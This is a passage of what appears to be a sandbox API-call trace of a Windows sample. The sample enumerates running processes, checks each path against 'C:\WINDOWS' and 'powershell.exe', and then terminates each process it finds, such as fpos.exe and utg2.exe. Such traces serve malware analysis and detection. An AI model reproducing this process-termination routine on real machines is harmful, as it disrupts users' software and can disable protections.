ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.283] GetTickCount () returned 0x11508d6 [0060.283] GetCurrentProcessId () returned 0xf00 [0060.284] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xd6c) returned 0x404 [0060.284] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.284] TerminateProcess (hProcess=0x404, uExitCode=0x11508d6) returned 1 [0060.285] CloseHandle (hObject=0x404) returned 1 [0060.285] CloseHandle (hObject=0x3fc) returned 1 [0060.285] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0060.286] GetCurrentProcessId () returned 0xf00 [0060.286] GetCurrentProcess () returned 0xffffffff [0060.286] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.286] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xbd8) returned 0x3fc [0060.286] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows NT\\fpos.exe" (normalized: "c:\\program files\\windows nt\\fpos.exe")) returned 0x24 [0060.286] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\fpos.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.286] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\fpos.exe", lpSrch="powershell.exe") returned 0x0 [0060.286] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\fpos.exe", lpSrch="powershell.exe") returned 0x0 [0060.286] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\fpos.exe", lpSrch="powershell.exe") returned 0x0 [0060.286] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\fpos.exe", lpSrch="powershell.exe") returned 0x0 [0060.286] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\fpos.exe", lpSrch="powershell.exe") returned 0x0 [0060.287] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.287] GetTickCount () returned 0x11508d6 [0060.287] GetCurrentProcessId () returned 0xf00 [0060.287] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xbd8) returned 0x404 [0060.287] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.287] TerminateProcess (hProcess=0x404, uExitCode=0x11508d6) returned 1 [0060.288] CloseHandle (hObject=0x404) returned 1 [0060.288] CloseHandle (hObject=0x3fc) returned 1 [0060.288] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0060.289] GetCurrentProcessId () returned 0xf00 [0060.289] GetCurrentProcess () returned 0xffffffff [0060.289] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.289] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xdc8) returned 0x3fc [0060.289] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Mozilla Firefox\\isspos.exe" (normalized: "c:\\program files\\mozilla firefox\\isspos.exe")) returned 0x2b [0060.289] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\isspos.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.289] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\isspos.exe", lpSrch="powershell.exe") returned 0x0 [0060.289] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\isspos.exe", lpSrch="powershell.exe") returned 0x0 [0060.289] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\isspos.exe", lpSrch="powershell.exe") returned 0x0 [0060.289] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\isspos.exe", lpSrch="powershell.exe") returned 0x0 [0060.290] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\isspos.exe", lpSrch="powershell.exe") returned 0x0 [0060.290] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.290] GetTickCount () returned 0x11508e6 [0060.290] GetCurrentProcessId () returned 0xf00 [0060.291] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xdc8) returned 0x404 [0060.291] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.291] TerminateProcess (hProcess=0x404, uExitCode=0x11508e6) returned 1 [0060.292] CloseHandle (hObject=0x404) returned 1 [0060.292] CloseHandle (hObject=0x3fc) returned 1 [0060.292] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0060.292] GetCurrentProcessId () returned 0xf00 [0060.292] GetCurrentProcess () returned 0xffffffff [0060.292] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.293] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xdfc) returned 0x3fc [0060.293] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Multimedia Platform\\mxslipstream.exe" (normalized: "c:\\program files (x86)\\windows multimedia platform\\mxslipstream.exe")) returned 0x43 [0060.294] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\mxslipstream.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.294] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\mxslipstream.exe", lpSrch="powershell.exe") returned 0x0 [0060.294] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\mxslipstream.exe", lpSrch="powershell.exe") returned 0x0 [0060.294] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\mxslipstream.exe", lpSrch="powershell.exe") returned 0x0 [0060.294] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\mxslipstream.exe", lpSrch="powershell.exe") returned 0x0 [0060.294] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\mxslipstream.exe", lpSrch="powershell.exe") returned 0x0 [0060.294] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.294] GetTickCount () returned 0x11508e6 [0060.294] GetCurrentProcessId () returned 0xf00 [0060.294] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xdfc) returned 0x404 [0060.294] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.294] TerminateProcess (hProcess=0x404, uExitCode=0x11508e6) returned 1 [0060.295] CloseHandle (hObject=0x404) returned 1 [0060.295] CloseHandle (hObject=0x3fc) returned 1 [0060.295] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0060.296] GetCurrentProcessId () returned 0xf00 [0060.296] GetCurrentProcess () returned 0xffffffff [0060.296] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.296] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1ec) returned 0x3fc [0060.296] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\MSBuild\\omnipos.exe" (normalized: "c:\\program files\\msbuild\\omnipos.exe")) returned 0x24 [0060.296] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\omnipos.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.296] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\omnipos.exe", lpSrch="powershell.exe") returned 0x0 [0060.297] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\omnipos.exe", lpSrch="powershell.exe") returned 0x0 [0060.297] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\omnipos.exe", lpSrch="powershell.exe") returned 0x0 [0060.297] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\omnipos.exe", lpSrch="powershell.exe") returned 0x0 [0060.297] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\omnipos.exe", lpSrch="powershell.exe") returned 0x0 [0060.297] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.297] GetTickCount () returned 0x11508e6 [0060.297] GetCurrentProcessId () returned 0xf00 [0060.297] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x1ec) returned 0x404 [0060.297] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.297] TerminateProcess (hProcess=0x404, uExitCode=0x11508e6) returned 1 [0060.298] CloseHandle (hObject=0x404) returned 1 [0060.298] CloseHandle (hObject=0x3fc) returned 1 [0060.298] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0060.299] GetCurrentProcessId () returned 0xf00 [0060.299] GetCurrentProcess () returned 0xffffffff [0060.299] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.299] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xa80) returned 0x3fc [0060.299] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Media Player\\spcwin.exe" (normalized: "c:\\program files (x86)\\windows media player\\spcwin.exe")) returned 0x36 [0060.378] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\spcwin.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.378] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\spcwin.exe", lpSrch="powershell.exe") returned 0x0 [0060.378] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\spcwin.exe", lpSrch="powershell.exe") returned 0x0 [0060.378] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\spcwin.exe", lpSrch="powershell.exe") returned 0x0 [0060.378] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\spcwin.exe", lpSrch="powershell.exe") returned 0x0 [0060.378] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\spcwin.exe", lpSrch="powershell.exe") returned 0x0 [0060.378] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.378] GetTickCount () returned 0x1150924 [0060.378] GetCurrentProcessId () returned 0xf00 [0060.379] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xa80) returned 0x404 [0060.379] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.379] TerminateProcess (hProcess=0x404, uExitCode=0x1150924) returned 1 [0060.380] CloseHandle (hObject=0x404) returned 1 [0060.380] CloseHandle (hObject=0x3fc) returned 1 [0060.380] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xea8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0060.380] GetCurrentProcessId () returned 0xf00 [0060.380] GetCurrentProcess () returned 0xffffffff [0060.380] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.381] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xea8) returned 0x3fc [0060.381] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows NT\\spgagentservice.exe" (normalized: "c:\\program files (x86)\\windows nt\\spgagentservice.exe")) returned 0x35 [0060.381] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows NT\\spgagentservice.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.381] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows NT\\spgagentservice.exe", lpSrch="powershell.exe") returned 0x0 [0060.381] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows NT\\spgagentservice.exe", lpSrch="powershell.exe") returned 0x0 [0060.381] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows NT\\spgagentservice.exe", lpSrch="powershell.exe") returned 0x0 [0060.381] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows NT\\spgagentservice.exe", lpSrch="powershell.exe") returned 0x0 [0060.381] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows NT\\spgagentservice.exe", lpSrch="powershell.exe") returned 0x0 [0060.381] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.381] GetTickCount () returned 0x1150924 [0060.381] GetCurrentProcessId () returned 0xf00 [0060.381] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xea8) returned 0x404 [0060.381] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.381] TerminateProcess (hProcess=0x404, uExitCode=0x1150924) returned 1 [0060.384] CloseHandle (hObject=0x404) returned 1 [0060.384] CloseHandle (hObject=0x3fc) returned 1 [0060.384] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0060.385] GetCurrentProcessId () returned 0xf00 [0060.385] GetCurrentProcess () returned 0xffffffff [0060.385] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.385] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe88) returned 0x3fc [0060.385] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Defender\\utg2.exe" (normalized: "c:\\program files (x86)\\windows defender\\utg2.exe")) returned 0x30 [0060.386] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\utg2.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.386] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\utg2.exe", lpSrch="powershell.exe") returned 0x0 [0060.386] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\utg2.exe", lpSrch="powershell.exe") returned 0x0 [0060.386] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\utg2.exe", lpSrch="powershell.exe") returned 0x0 [0060.386] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\utg2.exe", lpSrch="powershell.exe") returned 0x0 [0060.386] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\utg2.exe", lpSrch="powershell.exe") returned 0x0 [0060.386] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.386] GetTickCount () returned 0x1150934 [0060.386] GetCurrentProcessId () returned 0xf00 [0060.386] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xe88) returned 0x404 [0060.386] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.386] TerminateProcess (hProcess=0x404, uExitCode=0x1150934) returned 1 [0060.387] CloseHandle (hObject=0x404) returned 1 [0060.387] CloseHandle (hObject=0x3fc) returned 1 [0060.387] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="delivered_memo_playing.exe")) returned 1 [0060.388] GetCurrentProcessId () returned 0xf00 [0060.388] GetCurrentProcess () returned 0xffffffff [0060.388] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.388] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xfb8) returned 0x3fc [0060.388] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Mail\\delivered_memo_playing.exe" (normalized: "c:\\program files (x86)\\windows mail\\delivered_memo_playing.exe")) returned 0x3e [0060.388] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Mail\\delivered_memo_playing.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.388] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Mail\\delivered_memo_playing.exe", lpSrch="powershell.exe") returned 0x0 [0060.388] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Mail\\delivered_memo_playing.exe", lpSrch="powershell.exe") returned 0x0 [0060.388] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Mail\\delivered_memo_playing.exe", lpSrch="powershell.exe") returned 0x0 [0060.388] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Mail\\delivered_memo_playing.exe", lpSrch="powershell.exe") returned 0x0 [0060.388] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Mail\\delivered_memo_playing.exe", lpSrch="powershell.exe") returned 0x0 [0060.388] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.388] GetTickCount () returned 0x1150934 [0060.388] GetCurrentProcessId () returned 0xf00 [0060.388] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xfb8) returned 0x404 [0060.388] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.388] TerminateProcess (hProcess=0x404, uExitCode=0x1150934) returned 1 [0060.389] CloseHandle (hObject=0x404) returned 1 [0060.389] CloseHandle (hObject=0x3fc) returned 1 [0060.389] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="superior.exe")) returned 1 [0060.390] GetCurrentProcessId () returned 0xf00 [0060.390] GetCurrentProcess () returned 0xffffffff [0060.390] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.390] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xde0) returned 0x3fc [0060.390] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Adobe\\superior.exe" (normalized: "c:\\program files (x86)\\adobe\\superior.exe")) returned 0x29 [0060.391] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\superior.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.391] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\superior.exe", lpSrch="powershell.exe") returned 0x0 [0060.391] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\superior.exe", lpSrch="powershell.exe") returned 0x0 [0060.391] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\superior.exe", lpSrch="powershell.exe") returned 0x0 [0060.391] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\superior.exe", lpSrch="powershell.exe") returned 0x0 [0060.391] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\superior.exe", lpSrch="powershell.exe") returned 0x0 [0060.391] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.391] GetTickCount () returned 0x1150934 [0060.391] GetCurrentProcessId () returned 0xf00 [0060.391] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xde0) returned 0x404 [0060.391] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.391] TerminateProcess (hProcess=0x404, uExitCode=0x1150934) returned 1 [0060.392] CloseHandle (hObject=0x404) returned 1 [0060.392] CloseHandle (hObject=0x3fc) returned 1 [0060.392] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xea4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="eddiestrangermail.exe")) returned 1 [0060.393] GetCurrentProcessId () returned 0xf00 [0060.393] GetCurrentProcess () returned 0xffffffff [0060.393] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.393] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xea4) returned 0x3fc [0060.393] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Mozilla Firefox\\eddiestrangermail.exe" (normalized: "c:\\program files\\mozilla firefox\\eddiestrangermail.exe")) returned 0x36 [0060.393] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\eddiestrangermail.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.393] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\eddiestrangermail.exe", lpSrch="powershell.exe") returned 0x0 [0060.393] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\eddiestrangermail.exe", lpSrch="powershell.exe") returned 0x0 [0060.393] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\eddiestrangermail.exe", lpSrch="powershell.exe") returned 0x0 [0060.393] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\eddiestrangermail.exe", lpSrch="powershell.exe") returned 0x0 [0060.393] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\eddiestrangermail.exe", lpSrch="powershell.exe") returned 0x0 [0060.393] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.393] GetTickCount () returned 0x1150934 [0060.393] GetCurrentProcessId () returned 0xf00 [0060.393] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xea4) returned 0x404 [0060.393] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.393] TerminateProcess (hProcess=0x404, uExitCode=0x1150934) returned 1 [0060.394] CloseHandle (hObject=0x404) returned 1 [0060.394] CloseHandle (hObject=0x3fc) returned 1 [0060.394] Process32NextW (in: 